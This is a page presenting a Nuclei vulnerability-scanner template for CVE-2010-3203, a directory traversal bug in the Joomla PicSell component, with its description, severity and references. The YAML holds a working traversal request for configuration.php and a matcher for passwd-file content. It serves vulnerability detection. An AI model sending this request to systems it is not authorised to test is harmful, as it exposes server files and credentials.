Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
ID: CVE-2010-3203
Severity: medium
Author: daffainfo
Tags: cve,cve2010,edb,joomla,lfi,xmlswf
Description
Section titled “Description”A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-3203
info: name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval author: daffainfo severity: medium description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. impact: | Successful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14845 - https://nvd.nist.gov/vuln/detail/CVE-2010-3203 - http://web.archive.org/web/20150105095919/http://secunia.com:80/advisories/41187/ - http://www.exploit-db.com/exploits/14845 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 epss-score: 0.02682 epss-percentile: 0.90436 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xmlswf product: com_picsell tags: cve,cve2010,edb,joomla,lfi,xmlswf
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a00483046022100e7c8ff5ed0174e91ed6e6753ce25b201bf4712c72d5858c3eb17ed18b30d2c2d022100e78bcc25f36c3f5eed56431bd3ec116b6f09166ec8bc82a4415fa1546f925947:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-3203.yaml"